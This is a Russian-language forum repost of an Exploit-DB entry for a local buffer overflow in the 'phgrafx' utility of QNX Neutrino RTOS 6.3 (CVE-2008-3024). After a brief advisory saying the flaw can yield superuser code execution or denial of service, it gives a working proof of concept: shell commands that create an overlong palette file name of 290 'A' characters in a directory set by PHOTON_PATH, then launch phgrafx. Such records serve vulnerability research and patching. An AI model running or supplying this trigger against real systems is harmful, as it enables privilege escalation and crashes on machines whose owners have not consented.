Exploit QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32009
Проверка EDB
  1. Пройдено
Автор
FILIPE BALESTRA
Тип уязвимости
DOS
Платформа
UNIX
CVE
cve-2008-3024
Дата публикации
2008-07-01
Код:
source: https://www.securityfocus.com/bid/30024/info

QNX Neutrino RTOS is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. This issue affects the 'phgrafx' utility.

Attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts will result in a denial of service.

QNX Neutrino RTOS 6.3.2 and 6.3.0 are vulnerable; other versions may be affected as well.

# PHOTON_PATH=/tmp
# cd /tmp
# mkdir palette
# cd palette
# touch `perl -e 'print "A" x 290 . ".pal"'`
# /usr/photon/bin/phgrafx
 
Источник
www.exploit-db.com

Похожие темы